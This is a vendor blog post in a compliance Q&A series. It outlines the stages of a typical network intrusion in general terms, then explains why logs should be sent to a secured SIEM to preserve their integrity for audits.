30 Days of IT Compliance Q&A: #12 – How Do You Protect Your Log Information?

Why the auditor is asking this question:

Let us walk through an example of an attack of a system to understand why log data needs to be protected and why an auditor may ask this question.

1. Initial Compromise – this can be through exploiting a vulnerability or possibly social engineering. There is a good chance that if logs are being collected the initial compromise will be logged within them.
2. Establish Presence – This is where the attacker ensures there is a foothold on the system. This may use additional tools that are downloaded and executed on the system. Attacker will try to subvert various security defences in the network, collect credentials and potentially lay further malware. Again log information will show the network flows and process execution on the system.
3. Maintain Presence – The Attacker may now be moving laterally through the network using stolen and cracked credentials or exploiting further systems. This lateral movement will be able to be seen from logs such as network traffic, process execution, device configuration changes and suspicious authentications.
4. Exfiltration of Data – If the intent of the Attacker is to exfiltrate data, this is the stage that it would normally occur. Again this could be detected through suspicious network traffic.
5. Clean Up – Ok, so your data has been stolen, did the attacker leave evidence? There will be some clean up going on, removing malware, installed software and any back doors.

We have just described a potential attack. At many points there may have been suspicious activity that could have been detected through adequate log monitoring using a SIEM solution, but what if there was no monitoring in place? Without protecting the integrity of the log there would be no verifiable evidence and potentially no means of even understanding how the compromise occurred or how it can be stopped in the future.

It is often very difficult to verify the integrity of logs stored on the host system (if possible at all). The system may have been compromised and cannot be trusted.

The answer:

A proven method in ensuring your log integrity is to copy or send the logs to a log management and preferably a SIEM technology. Your SIEM and log management technology should be treated as a highly sensitive asset and needs appropriate logical and physical security to provide the integrity and assurance around the logs collected. A properly deployed and mature technology will certainly demonstrate in an audit that the log data is protected and forensically secure.

Want to learn how AccelOps can help you protect your log information? Contact us; we’re here to help.